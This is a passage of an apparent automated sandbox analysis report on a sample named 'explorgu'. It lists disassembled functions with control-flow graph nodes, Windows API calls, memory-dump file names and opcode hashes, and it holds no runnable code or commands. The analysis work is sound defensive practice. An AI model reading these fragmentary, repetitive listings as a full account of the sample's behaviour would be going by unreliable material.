                                                                                              • Associated: 00000005.00000002.2869479107.00000000005A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870183357.00000000005B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870349302.000000000074F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870373921.0000000000750000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870402298.0000000000751000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870435357.0000000000752000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_2a0000_explorgu.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0391ca46eaa96aa6cc9f9d673235b439a1fde89383269470fb19214c117ade2b
                                                                                              • Instruction ID: 2542a6f9093f9efdccf8b0bd72dcb14efcebee8d64ed78f61d17f468b640c068
                                                                                              • Opcode Fuzzy Hash: 0391ca46eaa96aa6cc9f9d673235b439a1fde89383269470fb19214c117ade2b
                                                                                              • Instruction Fuzzy Hash: 9361E0729346178FCF259FA8D8857EDBBA1AF59310F34416BE455AB391D7308C20CA91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 002A7110 Relevance: 1.7, APIs: 1, Instructions: 159COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2111 2a7110-2a7191 call 2d3a50 2115 2a719d-2a71c5 call 2b7360 call 2a5190 2111->2115 2116 2a7193-2a7198 2111->2116 2124 2a71c9-2a71eb call 2b7360 call 2a5190 2115->2124 2125 2a71c7 2115->2125 2117 2a72df-2a72fb call 2bc951 2116->2117 2130 2a71ef-2a7208 2124->2130 2131 2a71ed 2124->2131 2125->2124 2134 2a720a-2a7219 2130->2134 2135 2a7239-2a7264 2130->2135 2131->2130 2136 2a721b-2a7229 2134->2136 2137 2a722f-2a7236 call 2bcfc8 2134->2137 2138 2a7291-2a72b2 2135->2138 2139 2a7266-2a7275 2135->2139 2136->2137 2140 2a72fc-2a7301 call 2d6597 2136->2140 2137->2135 2144 2a72b8-2a72bd 2138->2144 2145 2a72b4-2a72b6 GetNativeSystemInfo 2138->2145 2142 2a7287-2a728e call 2bcfc8 2139->2142 2143 2a7277-2a7285 2139->2143 2142->2138 2143->2140 2143->2142 2149 2a72be-2a72c5 2144->2149 2145->2149 2149->2117 2150 2a72c7-2a72cf 2149->2150 2154 2a72d8-2a72db 2150->2154 2155 2a72d1-2a72d6 2150->2155 2154->2117 2156 2a72dd 2154->2156 2155->2117 2156->2117
                                                                                              APIs
                                                                                              • GetNativeSystemInfo.KERNELBASE(?), ref: 002A72B4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2869343241.00000000002A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002A0000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2869303035.00000000002A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869343241.0000000000301000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869456402.0000000000306000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000048F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000056D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000059A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.00000000005A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870183357.00000000005B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870349302.000000000074F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870373921.0000000000750000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870402298.0000000000751000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870435357.0000000000752000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_2a0000_explorgu.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InfoNativeSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1721193555-0
                                                                                              • Opcode ID: 37b9ac08a266ab73efc4c633971218a02b38f6796cd20f12f9286a1ffc974561
                                                                                              • Instruction ID: 8728dc6a82b5671a24ee49cdb9052b1541192046a9dc77b6578b54cc956aee6c
                                                                                              • Opcode Fuzzy Hash: 37b9ac08a266ab73efc4c633971218a02b38f6796cd20f12f9286a1ffc974561
                                                                                              • Instruction Fuzzy Hash: CB513771D282189BEB14EB68CD457EDB7759B46304F504299FC08A73C1EF309EE08B95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 002DCFF0 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2157 2dcff0-2dcffb 2158 2dcffd-2dd007 2157->2158 2159 2dd009-2dd00f 2157->2159 2158->2159 2160 2dd03d-2dd048 call 2d6e40 2158->2160 2161 2dd028-2dd039 RtlAllocateHeap 2159->2161 2162 2dd011-2dd012 2159->2162 2167 2dd04a-2dd04c 2160->2167 2164 2dd03b 2161->2164 2165 2dd014-2dd01b call 2d95bb 2161->2165 2162->2161 2164->2167 2165->2160 2170 2dd01d-2dd026 call 2d8633 2165->2170 2170->2160 2170->2161
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,002DA77F,?,?,002D6277,?,00000000,?,?,002D6EAB,?,00000000), ref: 002DD031
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2869343241.00000000002A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002A0000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2869303035.00000000002A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869343241.0000000000301000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869456402.0000000000306000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000048F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000056D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000059A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.00000000005A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870183357.00000000005B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870349302.000000000074F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870373921.0000000000750000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870402298.0000000000751000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870435357.0000000000752000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_2a0000_explorgu.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 89070b1b18d108ca33762fac0aedb15855e3b9d7c127ea14dde09023d607c3a9
                                                                                              • Instruction ID: aa462b5d49d2f00d152984123b09041de7cc44ea453112b2ed1a4ec4602a6633
                                                                                              • Opcode Fuzzy Hash: 89070b1b18d108ca33762fac0aedb15855e3b9d7c127ea14dde09023d607c3a9
                                                                                              • Instruction Fuzzy Hash: 6FF0BE3653692567DB312E26DC01B6B374C9BC17B2F298023A854A6390CA61EC224AF0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04E90BAB Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2260 4e90bab-4e90bae 2262 4e90b48-4e90bbf 2260->2262 2263 4e90bb0-4e90bc8 2260->2263 2267 4e90bca-4e90be3 2262->2267 2263->2267 2270 4e90be9-4e90c9b 2267->2270
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2873335929.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_4e90000_explorgu.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: EZX
                                                                                              • API String ID: 0-3867025536
                                                                                              • Opcode ID: a1badf12b44f3aff12e045a079d2195049470f06e7dd347947cb9bdc776f9a2e
                                                                                              • Instruction ID: 506b5574103482f8f284859a5c8253218c6f7bd1aad8d71354757cfe56bf5396
                                                                                              • Opcode Fuzzy Hash: a1badf12b44f3aff12e045a079d2195049470f06e7dd347947cb9bdc776f9a2e
                                                                                              • Instruction Fuzzy Hash: F021659724E3506EE683C29157506F67FE9EBC763437090A7F443C6182F2881E4A7232
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 002B64B0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2869343241.00000000002A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002A0000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2869303035.00000000002A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869343241.0000000000301000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869456402.0000000000306000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000048F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000056D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000059A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.00000000005A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870183357.00000000005B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870349302.000000000074F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870373921.0000000000750000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870402298.0000000000751000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870435357.0000000000752000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_2a0000_explorgu.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: 0c1fef4f48b3043e90f19c36222a07df3cccddacb9b711789ff1e3e4b2d61b9d
                                                                                              • Instruction ID: 90192b61be457fd8496dab85559c43a735bc3f8ea19a19bba966e29cd3124a53
                                                                                              • Opcode Fuzzy Hash: 0c1fef4f48b3043e90f19c36222a07df3cccddacb9b711789ff1e3e4b2d61b9d
                                                                                              • Instruction Fuzzy Hash: 6BF0F931950614A7C701BBACCD07B9E7BB4E742B60F800358E811673D1DB3059244BD2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04E90B5B Relevance: .1, Instructions: 86COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2312 4e90b5b-4e90be3 2317 4e90be9-4e90c9b 2312->2317
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2873335929.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_4e90000_explorgu.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4a1e420a7c1fed7b6d20e579d29f4570d641a2061b4eab754b618a95dac9a82d
                                                                                              • Instruction ID: e2754a81790c2b0f5e87ee085ffcf1d3f8e56c76bcb92ab0c9e619f893ad0378
                                                                                              • Opcode Fuzzy Hash: 4a1e420a7c1fed7b6d20e579d29f4570d641a2061b4eab754b618a95dac9a82d
                                                                                              • Instruction Fuzzy Hash: 3401C8D724E210BDE54281416B54AF76BEDA7D77347709467B407C2182F2D81E497131
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04E90B55 Relevance: .1, Instructions: 81COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2325 4e90b55-4e90be3 2331 4e90be9-4e90c9b 2325->2331
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2873335929.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_4e90000_explorgu.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fcb09c118ffd680d5f8b77331a4db073083d42f76eebb8fdd96cc89a795460cd
                                                                                              • Instruction ID: 7df6791754f45836d53c861911b5f6f60ea97e4e27ea1117f689213a180391d7
                                                                                              • Opcode Fuzzy Hash: fcb09c118ffd680d5f8b77331a4db073083d42f76eebb8fdd96cc89a795460cd
                                                                                              • Instruction Fuzzy Hash: 380192D764E220BDE54281826754AF66BEDE7D76343709067B807C1582F2C81E587131
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04E90B79 Relevance: .1, Instructions: 74COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2873335929.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_4e90000_explorgu.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 797d372fdd9cc8e45a7c72411d5b46684e68aef27ffb6125e8731dea2da3458a
                                                                                              • Instruction ID: e1cf5ac88a47f2f9c5a76878603a2f06dee19e7d55f7a7f09f41b7322e8de425
                                                                                              • Opcode Fuzzy Hash: 797d372fdd9cc8e45a7c72411d5b46684e68aef27ffb6125e8731dea2da3458a
                                                                                              • Instruction Fuzzy Hash: 1801D89724E260BCE54281826754AF66BE9B7D77343B0906BB40780582B2C81F5C7132
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04E90BF3 Relevance: .1, Instructions: 66COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2873335929.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_4e90000_explorgu.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2d32a953eb9ef9e9c37ec9977d2abbe378129db0ad4ee68f78807c7aaf86d24a
                                                                                              • Instruction ID: 69cdb3897628fca05fe4c55825366bf07b514c975153fa9b1dbfcf56d0f85be1
                                                                                              • Opcode Fuzzy Hash: 2d32a953eb9ef9e9c37ec9977d2abbe378129db0ad4ee68f78807c7aaf86d24a
                                                                                              • Instruction Fuzzy Hash: 17017B8724F390ADE90280919B14AF71F9DA7A35303709493F403C0682F1481E997271
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04E90BD2 Relevance: .1, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2873335929.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_4e90000_explorgu.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3716857cca1e1f589cef75c3f8ba251bdd22d706102a08eb001bbb668f72f0c1
                                                                                              • Instruction ID: 56c7443a077d34ec58bcf4d4723674a65c917d3291b63c9f7111362557ffe9e6
                                                                                              • Opcode Fuzzy Hash: 3716857cca1e1f589cef75c3f8ba251bdd22d706102a08eb001bbb668f72f0c1
                                                                                              • Instruction Fuzzy Hash: 10F059D730A214BDE442A0826F40AF72BDED3E67303B0A152B807815C1A2C91ED97131
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 002B88A0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 002B89F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2869343241.00000000002A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002A0000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2869303035.00000000002A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869343241.0000000000301000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869456402.0000000000306000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000048F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000056D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000059A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.00000000005A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870183357.00000000005B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870349302.000000000074F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870373921.0000000000750000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870402298.0000000000751000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870435357.0000000000752000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_2a0000_explorgu.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Concurrency::cancel_current_task
                                                                                              • String ID: p"*$p"*
                                                                                              • API String ID: 118556049-3082371842
                                                                                              • Opcode ID: 41211cc934a394df25992419e9cc6d12e5e9d17d33e7fc3b617bc24b5c155642
                                                                                              • Instruction ID: c657650d95d4123e54ffaac33090db42cd8a1334acc3f01eb42a6992ee04e4d5
                                                                                              • Opcode Fuzzy Hash: 41211cc934a394df25992419e9cc6d12e5e9d17d33e7fc3b617bc24b5c155642
                                                                                              • Instruction Fuzzy Hash: CA510672A201099BCF18DF68D8416EE77ACEF44380F54467AE919EB341DB70EE20CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 002B7360 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 002B7419
                                                                                              • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 002B744C
                                                                                              • __Mtx_destroy_in_situ.LIBCPMT ref: 002B7461
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2869343241.00000000002A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002A0000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2869303035.00000000002A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869343241.0000000000301000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869456402.0000000000306000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000048F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000056D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000059A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.00000000005A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870183357.00000000005B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870349302.000000000074F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870373921.0000000000750000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870402298.0000000000751000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870435357.0000000000752000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_2a0000_explorgu.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Cnd_unregister_at_thread_exitConcurrency::cancel_current_taskMtx_destroy_in_situ
                                                                                              • String ID: 0t+
                                                                                              • API String ID: 400173244-1019574576
                                                                                              • Opcode ID: 246e5e5546fd01dfbfd5b6aa34297a40097a11d3110fc3823b825739b5246bf9
                                                                                              • Instruction ID: 0f0b9e78a66222c134a93e39a8bcbafa2dfbad2050f35e780c8f437796e125be
                                                                                              • Opcode Fuzzy Hash: 246e5e5546fd01dfbfd5b6aa34297a40097a11d3110fc3823b825739b5246bf9
                                                                                              • Instruction Fuzzy Hash: 3B3118B19243059FD720DF68D841B9ABBF8EF44380F100A7EE945C7641E771EA64CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 002DC2B1 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2869343241.00000000002A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002A0000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2869303035.00000000002A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869343241.0000000000301000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869456402.0000000000306000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000048F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000056D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000059A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.00000000005A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870183357.00000000005B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870349302.000000000074F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870373921.0000000000750000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870402298.0000000000751000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870435357.0000000000752000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_2a0000_explorgu.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _strrchr
                                                                                              • String ID:
                                                                                              • API String ID: 3213747228-0
                                                                                              • Opcode ID: c2189248270ea340cbd842f54171ce7f18cb959cd5409b5c13150a41ec3c7c18
                                                                                              • Instruction ID: 7efc06850d074647293d7b98442830bf21f01e5629709af780ec92ddf5fe1568
                                                                                              • Opcode Fuzzy Hash: c2189248270ea340cbd842f54171ce7f18cb959cd5409b5c13150a41ec3c7c18
                                                                                              • Instruction Fuzzy Hash: 6FB134329242879FDB15CF68C8517BEBBE5EF55300F3481ABE845AB342D6349D11CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 002B9660 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 002B978C
                                                                                                • Part of subcall function 002A2360: ___std_exception_copy.LIBVCRUNTIME ref: 002A239E
                                                                                              • __Mtx_init_in_situ.LIBCPMT ref: 002B9872
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2869343241.00000000002A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002A0000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2869303035.00000000002A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869343241.0000000000301000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869456402.0000000000306000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000048F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000056D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000059A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.00000000005A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870183357.00000000005B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870349302.000000000074F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870373921.0000000000750000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870402298.0000000000751000.00000040.00000001.01000000.00000007.sdmpDownload File
